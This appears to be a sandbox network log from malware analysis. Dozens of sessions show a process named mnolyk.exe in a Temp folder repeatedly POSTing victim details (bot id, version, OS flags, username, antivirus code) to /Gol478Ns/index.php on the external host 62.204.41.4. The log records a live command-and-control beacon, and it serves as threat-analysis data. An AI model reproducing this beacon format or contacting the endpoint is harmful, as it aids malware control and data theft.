Feb 7, 2023 19:59:32.439969063 CET	768	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:32.504637957 CET	768	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
524	192.168.2.5	50237	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:32.701920986 CET	769	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:32.766763926 CET	769	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
525	192.168.2.5	50238	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:32.939538956 CET	770	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:33.003437996 CET	770	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
526	192.168.2.5	50239	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:33.185655117 CET	771	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:33.249748945 CET	771	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
527	192.168.2.5	50240	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:33.419821024 CET	772	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:33.483493090 CET	772	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
528	192.168.2.5	50241	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:33.653836966 CET	773	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:33.717493057 CET	773	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
529	192.168.2.5	50242	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:33.886857033 CET	774	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:33.950040102 CET	774	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
53	192.168.2.5	49755	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:18.963514090 CET	190	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:19.028769970 CET	191	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
530	192.168.2.5	50243	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:34.125339031 CET	775	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:34.191498995 CET	775	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
531	192.168.2.5	50244	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:34.357275009 CET	776	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:34.420140982 CET	776	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
532	192.168.2.5	50245	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:34.591840982 CET	777	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:34.655571938 CET	777	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
533	192.168.2.5	50246	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:34.827639103 CET	778	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:34.891089916 CET	778	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
534	192.168.2.5	50247	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:35.069046974 CET	779	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:35.133958101 CET	779	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
535	192.168.2.5	50248	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:35.309770107 CET	780	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:35.372901917 CET	780	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
536	192.168.2.5	50249	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:35.548839092 CET	781	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:35.614097118 CET	781	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
537	192.168.2.5	50250	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:35.782201052 CET	782	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:35.846967936 CET	782	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
538	192.168.2.5	50251	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:36.032975912 CET	783	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:36.099670887 CET	783	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
539	192.168.2.5	50252	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:36.278597116 CET	784	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:36.342716932 CET	784	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
54	192.168.2.5	49757	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:19.196420908 CET	201	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:19.260746002 CET	201	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
540	192.168.2.5	50253	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:36.518712044 CET	785	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:36.582421064 CET	785	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
541	192.168.2.5	50254	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:36.757802963 CET	786	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:36.821479082 CET	786	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
542	192.168.2.5	50255	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:37.003437996 CET	787	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:37.070807934 CET	787	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
